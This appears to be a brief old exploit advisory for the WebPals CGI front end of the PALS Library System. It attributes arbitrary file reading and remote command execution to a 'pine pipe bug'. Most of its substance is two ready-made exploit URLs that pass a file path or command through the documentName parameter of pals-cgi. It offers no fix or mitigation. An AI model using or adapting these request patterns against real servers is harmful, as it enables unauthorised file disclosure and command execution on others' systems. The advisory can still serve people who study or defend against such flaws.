Name   : PALS Library System "show files" Vulnerability and
         remote command executiom.
About  : This script is derived from an idea originated at
         St.Olaf College to provide a www interface to the
         PALS Library System. This idea was then worked on
         at Georgia State University. This version of
         WebPals has been written using their original ideal.
Problem: Through this bug you can see any files and command
         execution. Problem lies in "pine pipe bug"

Exploit:

http://www.victim.com/cgi-bin/pals-cgi?palsAction=restart&documentName=url_to_file
http://www.victim.com/pals-cgi?palsAction=restart&documentName=url_to_command

                                                     by: UkR-XblP (cuctema@ok.ru)